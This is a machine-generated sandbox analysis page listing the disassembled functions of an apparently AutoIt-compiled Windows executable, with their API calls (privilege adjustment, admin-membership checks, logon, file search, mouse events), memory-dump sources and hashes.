Instruction ID: 4a8ed0bcaa2ce8251a821c9f849c2f04cc73fadaa22127351e7fa0beaa5695b7
Opcode Fuzzy Hash: 04535602ea7789ce491688da2970f52f0b46a137e50a2cf850a9b6178f0004d4
Instruction Fuzzy Hash: 8E219275A00108DFCB00EF95DC84AEDBBB8FF49310F1480A9E905EB352DB319955EB50

Function 00F587E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00F20DB6: std::exception::exception.LIBCMT ref: 00F20DEC
Part of subcall function 00F20DB6: __CxxThrowException@8.LIBCMT ref: 00F20E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F5882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F58858
GetLastError.KERNEL32 ref: 00F58865

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 0455dce085dc965d0aa63a4f0a57179baf2a7ef8292ce0262be1ec71930f173e
Instruction ID: d471157c6ee8f7a41c9957bdad7f2b1541bb83cf60dfcc84c34bff0a7fe67f29
Opcode Fuzzy Hash: 0455dce085dc965d0aa63a4f0a57179baf2a7ef8292ce0262be1ec71930f173e
Instruction Fuzzy Hash: DC11BFB2804204AFE718DFA4EC85D7BB7F8EB04311B20852EF85593211EF30BC459B60

Function 00F5874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00F58774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00F5878B
FreeSid.ADVAPI32(?), ref: 00F5879B

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 5553f51f3e62d390dc890a1f8bbcf0f69b8084db9fcca30d3890a1fee236928c
Instruction ID: 18cb63db73c38189e9e05ae46b60c1ab0313041932560ea0b1c6291af173d5c6
Opcode Fuzzy Hash: 5553f51f3e62d390dc890a1f8bbcf0f69b8084db9fcca30d3890a1fee236928c
Instruction Fuzzy Hash: 8BF03775A1130CBFDB00DFE49C89ABEBBB8EF08311F1044A9AA01E2181E6756A089B50

Function 00F64C7F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00F64CB3

Strings

DOWN, xrefs: 00F64C98

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: mouse_event
String ID: DOWN
API String ID: 2434400541-711622031
Opcode ID: 9970f0b563e2974f780605b64fee541a97cbf4b036392f036fa910437d2774ac
Instruction ID: a4341004e5feffa5ecb7e9b7506bcc612c6d94ac3e3e631f78b9357e58db4643
Opcode Fuzzy Hash: 9970f0b563e2974f780605b64fee541a97cbf4b036392f036fa910437d2774ac
Instruction Fuzzy Hash: DCE08C3229DB313CF9483919BD07EFB238C8B12331B250206F810E55C2EE847C8239B9

Function 00F6C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00F6C6FB
FindClose.KERNEL32(00000000), ref: 00F6C72B

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: a8eaefb1cec0ce17112a3272dea42cb9726cb2dcae1f1863f355c7cd4c46cae8
Instruction ID: 669456c93d94e6fe60c18b4dd3542f97972a601da651717785ad8698c02861bc
Opcode Fuzzy Hash: a8eaefb1cec0ce17112a3272dea42cb9726cb2dcae1f1863f355c7cd4c46cae8
Instruction Fuzzy Hash: 26118E726042049FDB10DF29CC45A6AF7E8EF85324F44C51DF9A9C7391DB74A805EB81

Function 00F6A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00F79468,?,00F8FB84,?), ref: 00F6A097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00F79468,?,00F8FB84,?), ref: 00F6A0A9

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 40feae16558528099d20545566dd48a8653d4c2371d21ebd1f2b4867c83b3d75
Instruction ID: fb7b6522a3c69ddaa61230a596b40fa674d8f4c0d911945c3f52522566a44fdd
Opcode Fuzzy Hash: 40feae16558528099d20545566dd48a8653d4c2371d21ebd1f2b4867c83b3d75
Instruction Fuzzy Hash: C8F0823651522DBBDB21AFA4CC48FEA776DBF08361F004165F909D6181DA309944EBA1

Function 00F581CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F58309), ref: 00F581E0
CloseHandle.KERNEL32(?,?,00F58309), ref: 00F581F2

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 99cd0966cff6b1139b4f51d634d3c212075a4dc440383e98e4be23941fe89d5e
Instruction ID: 526ed791729a08bf31951469ec3013a58217b0ef926276ab35db44fcf1ae5597
Opcode Fuzzy Hash: 99cd0966cff6b1139b4f51d634d3c212075a4dc440383e98e4be23941fe89d5e
Instruction Fuzzy Hash: CCE0E672010911AFE7252B60FC05D777BE9EF04351715882DF955C4471DB615C95EB10

Function 00F2A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00F28D57,?,?,?,00000001), ref: 00F2A15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00F2A163

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 6fd2d5e14cfe4ee8919ec2172dfd2d0b19234aa62966ab103da46f9760dab0ff
Instruction ID: 72ae1cbdcd04d6263e6e087ae247b2aeb1574f8f1d384763512848cf1f231635
Opcode Fuzzy Hash: 6fd2d5e14cfe4ee8919ec2172dfd2d0b19234aa62966ab103da46f9760dab0ff
Instruction Fuzzy Hash: DEB0923125430CAFCA002B91EC0DBE83F68EB46AA2F404020F60D84060CB625454AB91

Function 00F2F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2320d09debb1a45782e45f8458214d6c1bb63beeb748b7a8b41b739c1eb94955
Instruction ID: 44eca18aa25932f256d7e6987ded753b7425f56e1a850980a1bc6417285a3409
Opcode Fuzzy Hash: 2320d09debb1a45782e45f8458214d6c1bb63beeb748b7a8b41b739c1eb94955
Instruction Fuzzy Hash: 0732F222D39F154DD723AA34DC72336A258AFB73D4F15D737E81AB59A9EB28C4836100

Function 00F3242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d99d38b2496105061ed5e48d25eb6713dcc04d22f11cf8a211d348e5ebec33
Instruction ID: fc5ea4093781dd4ff3d32a5e21a55c91dbf0491042b6bc03250318f087ef72a9
Opcode Fuzzy Hash: a3d99d38b2496105061ed5e48d25eb6713dcc04d22f11cf8a211d348e5ebec33
Instruction Fuzzy Hash: FDB1DF30D2AF454DD62397398831336B65CAFBB2D5F51D71BFC2674D22EB2285836181

Function 00F68889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00F6889B

Part of subcall function 00F2520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00F68F6E,00000000,?,?,?,?,00F6911F,00000000,?), ref: 00F25213
Part of subcall function 00F2520A: __aulldiv.LIBCMT ref: 00F25233

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 701e0b95adbf5182e2a278a8793799c316ca43278b7b31f3c4a3ad8a10e441f9
Instruction ID: 373752d5f017ec714a0a90237174fc48f3cd4b2c001546d97f82691e9e88ee7f
Opcode Fuzzy Hash: 701e0b95adbf5182e2a278a8793799c316ca43278b7b31f3c4a3ad8a10e441f9
Instruction Fuzzy Hash: 3E21AF32A356108BC729CF39D841A52B3E1EBA5321B688F6CD0F5CB2C0CA34A905EB54

Function 00F587B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00F58389), ref: 00F587D1

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 0bef6abfeb9c8b3089f3fe3836df558d6c6a502521b41f06a91e084471a57da4
Instruction ID: 2ea6c78a4e86eab450a2c385aba91aac799dab87588230bed2e1480a2950abaa
Opcode Fuzzy Hash: 0bef6abfeb9c8b3089f3fe3836df558d6c6a502521b41f06a91e084471a57da4
Instruction Fuzzy Hash: ACD09E3226450EAFEF019EA4DD05EFE3B69EB04B01F408511FE15D51A1C775D935AB60

Function 00F2A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00F2A12A

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 85c66bce7b769c4f9c4ea38dbd27f6c5d2d30077c7e1069654fd7b9bd41e9856
Instruction ID: fcb639c40ccd47c38f5089546237dc154cba8e173aeab0b6cc0d02a8a6bbfdc9
Opcode Fuzzy Hash: 85c66bce7b769c4f9c4ea38dbd27f6c5d2d30077c7e1069654fd7b9bd41e9856
Instruction Fuzzy Hash: ADA0113000020CAB8A002B82EC088A8BFACEA022A0B008020F80C800228B32A820AA80

Function 00F18808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23886e41c95e6d4676920e35f2b787701a7620a261b03db4a51d6ae5bbfe3d45
Instruction ID: 96fa6c699d582ae330593cd7749aebfa3a8ecf88065e86f4008a5a8962471c3a
Opcode Fuzzy Hash: 23886e41c95e6d4676920e35f2b787701a7620a261b03db4a51d6ae5bbfe3d45
Instruction Fuzzy Hash: 76224431D04546DBCF288B24C5A43BC7BA1BF017A5F68806ADA46CB492DB389DC7FB41

Function 00F221C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 82fa9de3945850695fceafc1c9ec124522e6b4ad7a0ef89a74e41f59f142be61
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: AFC1C8326050B34ADF6D8639E43413EFBA16EA27B135B076DD4B3CB1D5EE24C925E620

Function 00F225FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: d478da14c4f47d8eeec05da868886de81d1343e32e026e6556f4686b47f718d8
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 13C193336091B34ADF6D463AD43413EBAA16EA27B135B076DD4B2DB1D4EE20C925F620

Function 00F21978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 4337ba8c1f6e432bb6bbf89cecac234aca6ed08ae4907e1d5a0d80cf7d6f35aa
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 18C1A1366450B349DF2D463AE43413EBAA17EB27B135B076DD4B3CB1C4EE20C965E624

Function 00F77806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00F7785B
DeleteObject.GDI32(00000000), ref: 00F7786D
DestroyWindow.USER32 ref: 00F7787B
GetDesktopWindow.USER32 ref: 00F77895
GetWindowRect.USER32(00000000), ref: 00F7789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00F779DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00F779ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77A35
GetClientRect.USER32(00000000,?), ref: 00F77A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00F77A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77ABB
GlobalLock.KERNEL32(00000000), ref: 00F77AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77AD3
GlobalUnlock.KERNEL32(00000000), ref: 00F77ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77AE3
GlobalFree.KERNEL32(00000000), ref: 00F77AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00F92CAC,00000000), ref: 00F77B16
GlobalFree.KERNEL32(00000000), ref: 00F77B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00F77B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00F77B6B
